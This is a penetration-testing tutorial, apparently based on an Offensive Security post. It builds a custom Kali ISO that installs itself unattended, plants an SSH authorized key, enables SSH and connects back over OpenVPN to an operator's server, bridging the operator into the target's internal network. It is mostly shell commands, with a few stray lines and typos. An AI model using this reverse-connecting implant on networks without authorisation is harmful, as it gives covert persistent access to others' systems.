doom

Kali 2.0 Linux ISO of Doom

Setting up the OpenVPN Server

We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build The Kali Linux ISO of Doom on the same machine and make it available for download thorough HTTP

echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client

openvpn
openvpn
openvpn2
openvpn2


./build-dh
cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
cd /etc/openvpn
echo tls-server > server.conf
echo port 443 >> server.conf
echo proto tcp >> server.conf
echo dev tap >> server.conf
echo ca ca.crt >> server.conf
echo cert server.crt >> server.conf
echo key server.key >> server.conf
echo dh dh2048.pem >> server.conf
echo server 10.8.0.0 255.255.255.0 >> server.conf
echo push “redirect-gateway def1 bypass-dhcp” >> server.conf
echo client-config-dir static >> server.conf
echo keepalive 10 120 >> server.conf
echo comp-lzo >> server.conf
echo user nobody >> server.conf
echo group nogroup >> server.conf
echo persist-key >> server.conf
echo persist-tun >> server.conf
echo status openvpn-status.log >> server.conf
echo verb 3 >> server.conf
# Now we create the client keys. We can have more than one.
mkdir -p static
echo ifconfig-push 10.8.0.200 255.255.255.0 > static/client
cd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
ssh-keygen

Building the Kali Reverse VPN Agent ISO

Now comes the ISO generation. This is where we will build a custom Kali Linux ISO image with the specific set of tools we need for the engagement. The amazing part about this is how simple it is to accomplish compared to any other penetration testing distribution.

apt-get update
apt-get install git live-build cdebootstrap curl -y
git clone git://git.kali.org/live-build-config.git build
cd build
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
wget https://www.kali.org/dojo/unattended.txt -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
ssh-keygen
mkdir -p kali-config/common/includes.chroot/root/.ssh/
cp /root/.ssh/id_rsa.pub kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
mkdir kali-config/common/includes.chroot/etc
mkdir kali-config/common/includes.chroot/etc/openvpn
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/
cat << EOF > kali-config/common/includes.chroot/etc/openvpn/client.conf
client
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
comp-lzo
verb 3
EOF

apt-get remove --purge libdebian-installer4 -y
wget http://ftp.debian.org/debian/pool/main/libd/libdebian-installer/libdebian-installer_0.99.tar.xz
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
grep -R parser_rfc822 src
apt-get install automake libtool
autoreconf -i -v
./configure
make
make install
cd ~

lb config
lb build
mv binary.hybrid.iso /var/www/
service apache start
cd /etc/openvpn/
openvpn --config /etc/openvpn/server.conf

Now when you boot a system from the iso. The iso will start an unattended install and connects back over vpn after reboot.

Bridging the Network Gaps

Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.

On the server

We enable routing to the remote network on the OpenVPN server:

route add -net 192.168.101.0/24 gw 10.8.0.200

On the Kali Agent

We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE

With this complete, our remote target network is now fully accessible to to us. We can any any tools we have to interact with the remote network just as if it was connected as a WAN. All fully automated, and easy to setup. These sorts of customizations to Kali are where the real power lives.

based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/

FacebookTwitterGoogle+Share